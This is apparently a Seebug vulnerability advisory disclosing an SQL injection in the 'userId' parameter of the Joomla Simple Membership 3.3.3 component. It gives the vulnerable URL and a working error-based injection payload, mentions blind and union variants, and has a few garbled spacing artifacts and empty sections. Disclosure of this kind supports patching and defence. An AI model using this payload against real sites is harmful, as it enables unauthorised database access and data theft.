Joomla! Component Simple Membership 3.3.3 - 'userId' Parameter SQL Injection

2017-03-29T00:00:00
ID SSV:92848
Type seebug
Reporter Z3r0yu
Modified 2017-03-29T00:00:00

Description

Joomla! Component Simple Membership 3.3.3 - the 'userId' Parameter SQL Injection

Joomla! Component Simple Membership 3.3.3, the presence of the parameter filter is not strict, leading to a sql injection vulnerability, if the other server is turned on the error display, can directly use, if you turn off the error display, you can use the time-based and Boolean blind injection, you can also use union injection

Google Dork:

N/A

Injection point:

http://localhost/[PATH]/index. php? option=com_simplemembership&Itemid=1&task=showUsersProfile&userId=[SQL]

payload:

/index. php? option=com_simplemembership&Itemid=1&task=showUsersProfile&userId=1 AND (SELECT 1747 FROM(SELECT COUNT(*),CONCAT(md5(233),0x71716a6a71,(SELECT (ELT(1747=1747,1))),0x716a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA. The PLUGINS GROUP BY x)a)

Test screenshot:

Other types of injection: